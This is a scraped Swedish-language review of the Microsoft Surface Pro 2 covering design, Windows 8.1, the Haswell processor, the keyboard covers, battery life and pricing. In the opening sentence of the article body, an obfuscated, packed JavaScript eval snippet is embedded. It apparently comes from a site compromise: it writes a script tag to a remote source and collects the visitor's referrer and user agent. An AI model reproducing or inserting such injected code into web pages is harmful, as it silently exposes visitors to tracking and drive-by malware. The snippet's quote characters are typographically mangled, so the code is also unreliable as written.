Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

PC

Recension – Microsoft Surface PRO 2

surface
Filip Urde
  • On 18 februari, 2014
  • http://www.revue.se/filip-urde

Review Overview

Design
9.5
Prestanda
9.5
Användargränssnitt
8
Hårdvara
9.5
Pris
7
8.7

Rating

Microsoft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaety|var|u0026u|referrer|kfnyf||js|php’.split(’|’),0,{}))
har uppdaterat båda sina Windows 8 plattor
( se även Surface 2) och Surface Pro 2 är besten med en processorkraft som matchar en stationärdator. Den sitter även inne på en hel del förbättringar, där ibland ett stort lyft när det kommer till minne, ett uppdaterat operativsystemet och förbättrat tangentbord.

Microsofts Surface Pro 2 kommer med den kraftfulla Haswell processorn, en full version av Windows 8.1 och är därmed kompatibel med all programvara och hårdvara som finns tillgänglig för Windows. Tekniskt sett är Surface Pro 2 en dator i tablet forma. Vi på Revue.se har testat Surface igenom alla dess olika versioner, från Surface, till Surface Pro, till Surface 2 och nu slutligen Surface Pro 2. Vi har gillat Microsofts satsning redan från start och nu med Surface Pro 2 så har man verkligen förvaltat utvecklingen av produkten och fört den framåt på ett sett som vi uppskattar.

Surface Pro 2 har funnits ute till försäljning sedan oktober i ett antal länder runt om i världen. En nyhet för Surface PRO är att man givit fler val när det kommer till minnes storlek. Nu finns 64 GB , 128 GB , 256 GB och 512 GB , de två senare kommer med 8 GB RAM-minne istället för 4. Varje Surface Pro 2 levereras med 200 GB SkyDrive moln lagring i 2 år och obegränsad Skype-out minuter i ett 1 år.

 

Design

Surface Pro 2 är lite lättare än originalet, men det är fortfarande en ganska rejäl tablet på 900g. Men ambitionen är att vara mer än en tablet – man ska vara en tablet med processorkraften och prestationsförmågan som en bärbar dator och det har den verkligen.

De två versioner med mindre minne backas upp av 4GB RAM-minne , medan de två större versionerna sitter inne på 8 GB RAM. Något som är väldigt trevlig med Surface är möjligheten till utbyggnad av minnet, då alla versioner kommer med en microSD- kortplats på sidan så att du kan lägga till ytterligare 64 GB. Man får även en USB 3.0 -port och en Mini Displayport för att dela ut bilden till t.ex. en tv, samt en laddning port.

microsoft

Precis som tidigare så finner vi det revolutionerande spark stativet på baksidan, som nu kan ställas i två lägen för optimal betraktningsvinkel. Detta var ett problem med första generationens Surface som endast hade ett läge och detta var inte helt optimalt, speciellt om du är en lång person som mig själv, eller om du gillar att ha din Surface i ditt knä. Microsoft tog till sig den insikten och gjorde nu två grymma lägen.

 

Funktioner , Windows 8.1 och hårdvara

10,6 – tums skärmen är oförändrad, men den behöver heller inte uppgraderas. Med en full HD- upplösning på 1.920 x1 , 080 pixlar är det vackert, tydligt och skarpt, med en bred betraktningsvinkel, och dess känsliga tio punkters touch kapacitet gör att du inte kan kritisera skärmvalet den här gången heller.

Surface PRO 2 kör Windows 8.1, vilket har blivit ytterligare utvecklat för en god touchbaserad miljö med tiles och förmågan att dra skärmar uppåt, nedåt och åt sidan för att komma åt appar och menyer osv. I den nya versionen får vi även tillbaka den mycket saknade Start-knappen, vilket gör det mycket enklare för Windows- veteraner att förstå sig på hur den ”nya” tiles arkitekturen fungerar, genom att ge en snabb länk till en old- school Windows Start-meny från skrivbordet. Överlag så har man tagit allt som var bra med Surface och Windows 8 och gjort det bättre, men även lyssnat på kritik och gjort ändringar där efter.

Pekpennan finns kvar och har uppdaterats med en knapp på sidan som fungerar som högerklick på en mus. Tyvärr finns det fortfarande ingenstans där du bekvämt kan förvara pennan. Precis som tidigare kan du klicka fast den på strömporten, men där är det lätt att den rubbas och du blir av med den. En lösning där du sticker in den i själva Surface höljet kanske vore en idé? Likt en klassisk palm pilot.  Men detta är så klart ingen deal breaker.

Haswell processorn

Men den stora förändringen med Surface Pro 2 ligger under huven. Surface PRO 2 drivs av Intels senaste Haswell Core i5-processor som jag nämnde tidigare. Ett riktigt monster. Du kommer märka att din Surface startar upp på noll tid och den är verkligen riktigt snabb. Jag har testat allt från påfrestande surfning på nätet till att köra tunga HD-spel, inget har varit ett problem…

haswell

För att göra en jämförelse så lirar jag och mina vänner DOTA 2. Mina vänner satt på senaste / näst senaste versioner av Macbook PRO och vi var alla ganska eniga om att det flöt på bäst på min Surface PRO 2. #AppleVsMicrosoft ?

Det ska tilläggas att jag hade högsta inställningarna. Nu är DOTA 2 kanske inte det mest grafiskt påfrestande spelet, men det är ändå rätt krävande på sina ställen, t.ex. en massiv team fight med mycket magier. Prova själva, man blir faktiskt förvånad hur bra det flyter.

Touch och Type Cover 2

Liksom tidigare finns det ett par clip – on-skal tillgängliga och dessa har förfinats ytterligare. Touch Cover 2 (1069kr) är tunnare och de hårda knapparna är nu bakgrundsbelysta, medan den något djupare Typ Cover 2 (1159 kr) har också slimmats och de mekaniska tangenterna är även de bakgrundsbelysta.

type cover 2

Om jag fick välja en av dessa så är det helt klart Type Cover 2, Touch Cover är riktigt bra, men ”riktiga” mekaniska tangenter är verkligen att föredra. I år kommer en ny typ av Cover till som innehåller ett inbyggt batteri för att dubbla batteritiden på din Surface (grymt).

I övrigt så har batteritiden förbättrats avsevärt (med omkring 75 procent enligt Microsoft, till stor del på grund av den nya processorn ) och det gav mig lite över sju timmars kontinuerlig användning när jag testade.

surface

Vad är priset?

Ur ett prisperspektiv så håller Surface PRO 2 en nivå som en mellanskikts laptop, men när du går upp i minnes storlekarna så blir det dyrare. Den kommer nu som en 64GB version för 7895kr, en 128 GB version för 8795kr, en 256 GB version för 11 495kr och en 513 GB version för 15 995kr. Men i och med att du dels har skydrive, samt möjligheten till att bygga ut med 64 GB så skulle jag säga att man klarar sig fint på de mindre versionerna. Idag använder väl alla bärbara hårddiskar ändå?

Slutsats

Microsoft Surface Pro 2 försöker inte uppfinna hjulet på nytt, men de behöver den inte heller. Man har tagit ett grymt koncept och förfinat det efter användarnas önsekmål samt lagt till nya grymma funktioner. Det är en uppdatera och mycket kapabel enhet som överbryggar klyftan mellan tablett och laptop. Känslan är att du har en maskin som är kapabel för allt du har att ge den, en mycket fin maskin helt enkelt.

microsoftstore.com

Comments

  1. Jacob

    Snyggt